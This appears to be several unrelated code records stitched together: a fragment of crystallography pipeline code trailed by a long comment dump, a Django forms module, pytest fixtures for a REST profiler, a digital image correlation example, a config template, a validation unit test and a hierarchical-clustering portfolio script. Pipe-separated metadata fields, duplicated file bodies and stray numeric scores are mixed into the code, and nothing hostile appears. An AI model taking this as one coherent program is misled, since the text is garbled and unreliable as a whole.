def convert_map_to_sf(self,emap,reso):
self.Logfile.insert('converting ccp4 map to mtz with phenix.map_to_structure_factors: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.map_to_structure_factors %s d_min=%s\n' %(emap,reso)+
'/bin/mv map_to_structure_factors.mtz %s' %emap.replace('.ccp4', '.mtz') )
os.system(cmd)
def get_lig_cc(self,mtz,lig):
self.Logfile.insert('calculating CC for %s in %s' %(lig,mtz))
if os.path.isfile(mtz.replace('.mtz', '_CC.log')):
self.Logfile.warning('logfile of CC analysis exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.get_cc_mtz_pdb %s %s > %s' % (mtz, lig, mtz.replace('.mtz', '_CC.log')) )
os.system(cmd)
def check_lig_cc(self,log):
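# parses the phenix.get_cc_mtz_pdb log written above: for every line starting with
# 'local' the last whitespace-separated token is taken as the CC (the last match wins)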
cc = 'n/a'
if os.path.isfile(log):
for line in open(log):
if line.startswith('local'):
cc = line.split()[len(line.split()) - 1]
else:
self.Logfile.error('logfile does not exist: %s' %log)
return cc
def convert_map_to_sf_with_gemmi(self,emap,p):
self.Logfile.insert('converting ccp4 map to mtz with gemmi map2sf: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = 'gemmi map2sf %s %s FWT PHWT --dmin=%s' %(emap,emap.replace('.ccp4','.mtz'),p.resolution)
self.Logfile.insert('converting map with command:\n' + cmd)
os.system(cmd) | en | 0.659973 | # last edited: 10/08/2017, 10:25 #from XChemUtils import mtztools #def get_names_of_current_clusters(xce_logfile,panddas_directory): # Logfile=XChemLog.updateLog(xce_logfile) # Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory)) # os.chdir('{0!s}/cluster_analysis'.format(panddas_directory)) # cluster_dict={} # for out_dir in sorted(glob.glob('*')): # if os.path.isdir(out_dir): # cluster_dict[out_dir]=[] # found_first_pdb=False # for folder in glob.glob(os.path.join(out_dir,'pdbs','*')): # xtal=folder[folder.rfind('/')+1:] # if not found_first_pdb: # if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ): # cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb')) # found_first_pdb=True # cluster_dict[out_dir].append(xtal) # return cluster_dict # self.initial_model_directory=initial_model_directory # self.db.create_missing_columns() # self.db_list=self.db.get_empty_db_dict() # self.external_software=XChemUtils.external_software(xce_logfile).check() # self.xce_logfile=xce_logfile # self.already_exported_models=[] # find all folders with *-pandda-model.pdb # if only NEW models shall be exported, check timestamps # find pandda_inspect_events.csv and read in as pandas dataframe # find out ligand event map relationship # convert event map to SF # move existing event maps in project directory to old folder # copy event MTZ to project directory # copy pandda-model to project directory # make map from MTZ and cut around ligand # update database # refine models # some time in the future... # create folder for new refinement cycle # compoundID=str(item[1]) ####################################################### # create folder for new refinement cycle # first find which samples are in interesting datasets and have a model # and determine the timestamp # now get these models from the database and compare the datestamps # Note: only get the models that underwent some form of refinement, # because only if the model was updated in pandda.inspect will it be exported and refined # compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB # this will be raised if timestamp is not properly formatted; # which will usually be the case when respective field in database is blank # these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017) # update the DB: # set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...' # v1.3.8.2 - removed option to update database only # if not self.update_datasource_only: # if not self.update_datasource_only: # sample_list=self.db.execute_statement("select CrystalName,CompoundCode from mainTable where RefinementOutcome='2 - PANDDA model';") # for item in sample_list: # xtal=str(item[0]) # compoundID=str(item[1]) ####################################################### # create folder for new refinement cycle # elif xtal in os.path.join(self.panddas_directory,'processed_datasets',xtal,'modelled_structures', # '{}-pandda-model.pdb'.format(xtal)): # self.Logfile.insert('{}: cannot start refinement because {}'.format(xtal,xtal) + # ' does not have a modelled structure. 
Check whether you expect this dataset to ' + # ' have a modelled structure, compare pandda.inspect and datasource,' # ' then tell XCHEMBB ') # first make a note of all the datasets which were used in pandda directory # do the same as before, but look for rejected datasets # check if EVENT map exists in project directory # initial pandda model and mtz file # find apo structures which were used # XXX missing XXX # this is necessary, otherwise RefinementOutcome will be reset for samples that are actually already in refinement # finally find all samples which do not have a pandda hit # DimplePANDDAhit # for xtal in glob.glob('*'): # if xtal not in pandda_hit_list: # self.Logfile.insert(xtal+': not in interesting_datasets; updating database...') # self.db.execute_statement("update mainTable set DimplePANDDAhit = 'False' where CrystalName is '{0!s}'".format(xtal)) # first find which samples are in interesting datasets and have a model # and determine the timestamp # now get these models from the database and compare the datestamps # Note: only get the models that underwent some form of refinement, # because only if the model was updated in pandda.inspect will it be exported and refined # compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB # this will be raised if timestamp is not properly formatted; # which will usually be the case when respective field in database is blank # these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017) # update the DB: # set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...' # 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n' # print self.reference_dir # print self.filter_pdb # how to run pandda.analyse on large datasets # # 1) Run the normal pandda command, with the new setting, e.g. # pandda.analyse data_dirs=... max_new_datasets=500 # This will do the analysis on the first 500 datasets and build the statistical maps - just as normal. # # 2) Run pandda with the same command: # pandda.analyse data_dirs=... max_new_datasets=500 # This will add 500 new datasets, and process them using the existing statistical maps # (this will be quicker than the original analysis). It will then merge the results of the two analyses. # # 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal. # modulo gives remainder after integer division # if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh': # source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n') # elif os.getenv('SHELL') == '/bin/bash' or self.use_remote: # source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n' # source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n') # else: # source_file='' # v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4 # 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete # source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n' # note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017) # #>>> for testing # self.submit_mode='local machine' # handles remote submission of pandda.analyse jobs # 1.) prepare output directory # 2.) 
go through project directory and make sure that all pdb files really exist # broken links derail the giant.cluster_mtzs_and_pdbs script # 3.) giant.cluster_mtzs_and_pdbs # os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)) # 4.) analyse output # 5.) update datasource # 6.) finish # reasons why pandda cannot be run # - there is currently a job running in the pandda directory # - min datasets available is too low # - required input paramters are not complete # - map amplitude and phase labels don't exist # remove exisiting mtz file # event maps generated with pandda v0.2 or higher have the same symmetry as the crystal # but phenix.map_to_structure_facors only accepts maps in spg P1 # therefore map is first expanded to full unit cell and spg of map then set tp p1 # other conversion option like cinvfft give for whatever reason uninterpretable maps # run phenix.map_to_structure_factors # check if output files exist # update datasource with event_map_mtz information # see also: # http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model # program complains if resolution is 1.2 or higher # mtzin is usually refine.mtz # now need to check if there is a unassigned entry in panddaTable that is close | 2.021227 | 2 |
OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 0 | 8027 | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
class PerfilForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'first_name',
'last_name',
'celular',
)
labels = {
'first_name': _('Name'),
'last_name': _('Last Name'),
'celular': _('Mobile Phone'),
}
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control'}),
'last_name': forms.TextInput(attrs={'class': 'form-control'}),
'celular': forms.TextInput(attrs={'class': 'form-control'}),
}
class PersonaChangeForm(UserChangeForm):
"""for something will be
"""
class Meta(UserChangeForm.Meta):
model = PyUser
fields = (
'email',
'is_superuser',
'is_staff',
'is_active',
'last_login',
'date_joined',
'first_name',
'last_name',
)
# ========================================================================== #
class PasswordRecoveryForm(forms.ModelForm):
"""To send the account recovery correction
"""
class Meta():
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
# ========================================================================== #
class PasswordSetForm(forms.Form):
"""To send the account recovery correction
"""
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Password')}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Retype password')}
)
)
    def clean(self):
        cleaned_data = super().clean()
        password1 = cleaned_data.get('password1')
        password2 = cleaned_data.get('password2')
        if password1 != password2:
            raise forms.ValidationError(
                _('The two password fields didn\'t match.')
            )
        return cleaned_data
class PersonaCreationForm(UserCreationForm):
"""This form class renders the record sheet of
users
"""
class Meta(UserCreationForm.Meta):
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
class AvatarForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'avatar',
)
class InitForm(forms.ModelForm):
"""From of OMegaERP initializacion
"""
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
'placeholder': _('Admin email')
}
)
)
password = forms.CharField(
max_length=100,
widget=forms.PasswordInput(
attrs={
'placeholder': _('Admin Password')
}
)
)
class Meta:
model = PyCompany
fields = [
'name',
'country',
'email',
'password'
]
labels = {
'name': _('Company Name'),
'country': _('Country'),
'email': _('Admin user email'),
'password': _('Password'),
}
widgets = {
'name': forms.TextInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Company Name'),
'style': 'width: 100%',
},
),
'country': autocomplete.ModelSelect2(
url='PyCountry:autocomplete',
attrs={
'class': 'form-control',
'data-placeholder': _('Select a country...'),
'style': 'width: 100%',
},
),
'email': forms.EmailInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Admin user email'),
'style': 'width: 100%',
},
),
}
class ActivateForm(forms.Form):
"""To activate or deactivate an object in OmegaERP
"""
object_name = forms.CharField(max_length=100, widget=forms.HiddenInput)
object_pk = forms.IntegerField(widget=forms.HiddenInput) | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
class PerfilForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'first_name',
'last_name',
'celular',
)
labels = {
'first_name': _('Name'),
'last_name': _('Last Name'),
'celular': _('Mobile Phone'),
}
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control'}),
'last_name': forms.TextInput(attrs={'class': 'form-control'}),
'celular': forms.TextInput(attrs={'class': 'form-control'}),
}
class PersonaChangeForm(UserChangeForm):
"""for something will be
"""
class Meta(UserChangeForm.Meta):
model = PyUser
fields = (
'email',
'is_superuser',
'is_staff',
'is_active',
'last_login',
'date_joined',
'first_name',
'last_name',
)
# ========================================================================== #
class PasswordRecoveryForm(forms.ModelForm):
"""To send the account recovery correction
"""
class Meta():
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
# ========================================================================== #
class PasswordSetForm(forms.Form):
"""To send the account recovery correction
"""
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Password')}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Retype password')}
)
)
    def clean(self):
        cleaned_data = super().clean()
        password1 = cleaned_data.get('password1')
        password2 = cleaned_data.get('password2')
        if password1 != password2:
            raise forms.ValidationError(
                _('The two password fields didn\'t match.')
            )
        return cleaned_data
class PersonaCreationForm(UserCreationForm):
"""This form class renders the record sheet of
users
"""
class Meta(UserCreationForm.Meta):
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
class AvatarForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'avatar',
)
class InitForm(forms.ModelForm):
"""From of OMegaERP initializacion
"""
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
'placeholder': _('Admin email')
}
)
)
password = forms.CharField(
max_length=100,
widget=forms.PasswordInput(
attrs={
'placeholder': _('Admin Password')
}
)
)
class Meta:
model = PyCompany
fields = [
'name',
'country',
'email',
'password'
]
labels = {
'name': _('Company Name'),
'country': _('Country'),
'email': _('Admin user email'),
'password': _('Password'),
}
widgets = {
'name': forms.TextInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Company Name'),
'style': 'width: 100%',
},
),
'country': autocomplete.ModelSelect2(
url='PyCountry:autocomplete',
attrs={
'class': 'form-control',
'data-placeholder': _('Select a country...'),
'style': 'width: 100%',
},
),
'email': forms.EmailInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Admin user email'),
'style': 'width: 100%',
},
),
}
class ActivateForm(forms.Form):
"""To activate or deactivate an object in OmegaERP
"""
object_name = forms.CharField(max_length=100, widget=forms.HiddenInput)
object_pk = forms.IntegerField(widget=forms.HiddenInput) | en | 0.688546 | # -*- coding: utf-8 -*- Global app forms # Standard Library # Django Library # Thirdparty Library # Localfolder Library Class to update the user profile on the system for something will be # ========================================================================== # To send the account recovery correction # ========================================================================== # To send the account recovery correction This form class renders the record sheet of users Class to update the user profile on the system From of OMegaERP initializacion To activate or deactivate an object in OmegaERP | 2.02492 | 2 |
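
The forms above are plain Django Form/ModelForm subclasses, so they plug into views in the usual way. The sketch below shows one way PerfilForm might be wired up; the import path, URL name and template path are illustrative assumptions, not taken from the FerpMenu repository.

# Hypothetical view using PerfilForm (import path, URL name and template are assumptions).
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect, render
from Apps.base.forms import PerfilForm  # assumed import path

@login_required
def edit_profile(request):
    # Bind the form to the logged-in PyUser so current values pre-populate the fields.
    form = PerfilForm(request.POST or None, instance=request.user)
    if request.method == 'POST' and form.is_valid():
        form.save()
        return redirect('profile')
    return render(request, 'base/profile_edit.html', {'form': form})
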
test-drf-project/tests/conftest.py | fvlima/drf-view-profiler | 30 | 8028 | from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def mock_http_request():
http_request = HttpRequest()
http_request.method = "GET"
return http_request
@pytest.fixture
def mock_http_response(mock_http_request):
response = Response()
mock_http_request.line_profiler = mock.Mock()
mock_http_request.parser_context = {"view": mock.Mock()}
response.renderer_context = {"request": mock_http_request}
return response
@pytest.fixture
def mock_output_writer(monkeypatch):
mock_output_writer_ = mock.Mock()
monkeypatch.setattr("drf_viewset_profiler.middleware.output_writer.stream", mock_output_writer_)
return mock_output_writer_
@pytest.fixture
def mock_line_profiler_viewset_middleware():
return LineProfilerViewSetMiddleware()
| from unittest import mock
import pytest
from django.http import HttpRequest
from rest_framework.response import Response
from rest_framework.test import APIClient
from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware
@pytest.fixture
def api_client():
return APIClient()
@pytest.fixture
def mock_http_request():
http_request = HttpRequest()
http_request.method = "GET"
return http_request
@pytest.fixture
def mock_http_response(mock_http_request):
response = Response()
mock_http_request.line_profiler = mock.Mock()
mock_http_request.parser_context = {"view": mock.Mock()}
response.renderer_context = {"request": mock_http_request}
return response
@pytest.fixture
def mock_output_writer(monkeypatch):
mock_output_writer_ = mock.Mock()
monkeypatch.setattr("drf_viewset_profiler.middleware.output_writer.stream", mock_output_writer_)
return mock_output_writer_
@pytest.fixture
def mock_line_profiler_viewset_middleware():
return LineProfilerViewSetMiddleware()
| none | 1 | 2.198992 | 2 |
|
Examples/VirtualLab/virtual_experiment_f.py | diehlpk/muDIC | 70 | 8029 | # This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| # This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformed
F = np.array([[1.01,0],[0.01,1.0]])
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
input = dic.DICInput(mesh, image_stack)
input.tol = 1e-6
input.interpolation_order = 4
dic_job = dic.DICAnalysis(input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| en | 0.906513 | # This allows for running the example when the repo has been cloned # Example code follows This example case runs an experiment where a deformation gradient is used to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four and sensor artifacts are included. The analysis is then performed and the resulting deformation gradient field is compared to the one used to deform the images # Set the amount of info printed to terminal during analysis # Define the image you want to analyse # Make a speckle image # Make an image deformed # Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities # Make a noise injector producing 2% gaussian additive noise # Make an synthetic image generation pipeline # Put it into an image stack # Now, make a mesh. Make sure to use enough elements #mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI # Prepare the analysis input and initiate the analysis # Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4. # We will now compare the results from the analysis to the deformation gradient which the image was deformed by #line1 = ax1.plot(res_field[:, 50], label="correct") | 2.461902 | 2 |
src/template_config.py | ckaestne/toxicity-detector | 7 | 8030 | <filename>src/template_config.py
mongo = { "user": "", "passwd": "", "db": "ghtorrent" }
perspective_api_key = ""
| <filename>src/template_config.py
mongo = { "user": "", "passwd": "", "db": "ghtorrent" }
perspective_api_key = ""
| none | 1 | 1.138955 | 1 |
|
tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 1 | 8031 | <filename>tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py<gh_stars>1-10
from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_column_headers(database):
expected_subset = {"row_number", "awarding_office_code"}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| <filename>tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py<gh_stars>1-10
from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_column_headers(database):
expected_subset = {"row_number", "awarding_office_code"}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| en | 0.855806 | AwardingOfficeCode must be six characters long. AwardingOfficeCode must be six characters long. | 2.407259 | 2 |
Optimisation Portfolios/HERC.py | BrandonAFong/Ideas | 0 | 8032 | <reponame>BrandonAFong/Ideas<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
def intersection(list1, list2):
    # Return the common elements as a flat list so the result can be compared
    # against a sorted cluster membership list in compute_allocation().
    intersec = list(set(list1) & set(list2))
    return intersec
def compute_allocation(covar, clusters,Z,dimensions):
numClusters = len(clusters)
aWeights = np.array([1.] * len(covar))
cWeights = np.array([1.] * numClusters)
cVar = np.array([0.] * numClusters)
for i, cluster in clusters.items():
cluster_covar = covar[cluster, :][:, cluster]
inv_diag = 1 / np.diag(cluster_covar)
aWeights[cluster] = inv_diag / np.sum(inv_diag)
for i, cluster in clusters.items():
weights = aWeights[cluster]
cVar[i - 1] = np.dot(
weights, np.dot(covar[cluster, :][:, cluster], weights))
for m in range(numClusters - 1):
left = int(Z[dimensions - 2 - m, 0])
lc = seriation(Z, dimensions, left)
right = int(Z[dimensions - 2 - m, 1])
rc = seriation(Z, dimensions, right)
id_lc = []
id_rc = []
for i, cluster in clusters.items():
if sorted(intersection(lc, cluster)) == sorted(cluster):
id_lc.append(i)
if sorted(intersection(rc, cluster)) == sorted(cluster):
id_rc.append(i)
id_lc = np.array(id_lc) - 1
id_rc = np.array(id_rc) - 1
alpha = 0
lcVar = np.sum(cVar[id_lc])
rcVar = np.sum(cVar[id_rc])
alpha = lcVar / (lcVar + rcVar)
cWeights[id_lc] = cWeights[
id_lc] * alpha
cWeights[id_rc] = cWeights[
id_rc] * (1 - alpha)
for i, cluster in clusters.items():
aWeights[cluster] = aWeights[cluster] * cWeights[
i - 1]
return aWeights
#Dataframe of returns
def HERC(mat_ret):
#Need to first calculate the optimal number of clusters
#The mat_ret that goes into this must be a np array of returns
# correl_mat = mat_ret.corr(method='pearson')
column_dic = {k:v for v, k in enumerate(mat_ret.columns)}
correl_mat = df_to_matrix(mat_ret.corr(method='pearson'))
dist = 1 - correl_mat
dim = len(dist)
tri_a, tri_b = np.triu_indices(dim, k = 1)
Z = fastcluster.linkage(dist[tri_a, tri_b], method='ward')
optimalK = OptimalK(parallel_backend = 'rust')
n_clusters = optimalK(mat_ret.values, cluster_array = np.arange(1,len(mat_ret)))
nb_clusters = n_clusters
clustering_inds = fcluster(Z, nb_clusters, criterion='maxclust')
clusters = {i: [] for i in range(min(clustering_inds),max(clustering_inds) + 1)}
for i, v in enumerate(clustering_inds):
clusters[v].append(i)
HERC_w = compute_allocation(correl_mat, clusters, Z, dim)
HERC_w = pd.Series(HERC_w)
my_inverted_dict = dict(map(reversed, column_dic.items()))
HERC_w = HERC_w.rename(index = my_inverted_dict)
return HERC_w
